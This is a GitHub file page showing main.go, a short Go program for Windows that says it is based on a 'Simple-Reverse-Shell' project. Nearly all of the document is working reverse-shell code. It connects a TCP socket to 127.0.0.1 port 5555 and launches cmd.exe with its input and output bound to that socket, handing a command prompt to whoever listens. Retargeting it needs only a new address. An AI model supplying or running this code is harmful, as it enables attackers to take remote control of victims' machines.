-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmain.go
More file actions
74 lines (68 loc) · 1.4 KB
/
main.go
File metadata and controls
74 lines (68 loc) · 1.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
package main
// Based on https://github.com/tihanyin/Simple-Reverse-Shell/
import (
"golang.org/x/sys/windows"
"log"
"net"
"syscall"
"unsafe"
)
var (
wsaData windows.WSAData
R windows.Sockaddr
)
func ipToSockaddr(family int, ip net.IP, port int) (windows.Sockaddr, error) {
switch family {
case syscall.AF_INET:
if len(ip) == 0 {
ip = net.IPv4zero
}
if ip = ip.To4(); ip == nil {
return nil, net.InvalidAddrError("non-IPv4 address")
}
sa := new(windows.SockaddrInet4)
for i := 0; i < net.IPv4len; i++ {
sa.Addr[i] = ip[i]
}
sa.Port = port
return sa, nil
}
return nil, net.InvalidAddrError("unexpected socket family")
}
func main() {
windows.WSAStartup(514, &wsaData)
s1, err := windows.WSASocket(windows.AF_INET, windows.SOCK_STREAM, windows.IPPROTO_TCP, nil, 0, 0)
if err != nil {
log.Println(err)
}
R, err = ipToSockaddr(windows.AF_INET, net.ParseIP("127.0.0.1"), 5555)
if err != nil {
log.Println(err)
}
windows.Connect(s1, R)
A := new(windows.StartupInfo)
A.Cb = uint32(unsafe.Sizeof(*A))
A.Flags = syscall.STARTF_USESTDHANDLES | syscall.STARTF_USESHOWWINDOW
A.StdInput = s1
A.StdOutput = s1
A.StdErr = s1
B := new(windows.ProcessInformation)
c, err := windows.UTF16PtrFromString("cmd.exe")
if err != nil {
log.Println(err)
}
err = windows.CreateProcess(
nil,
c,
nil,
nil,
true,
0,
nil,
nil,
A,
B)
if err != nil {
log.Println(err)
}
}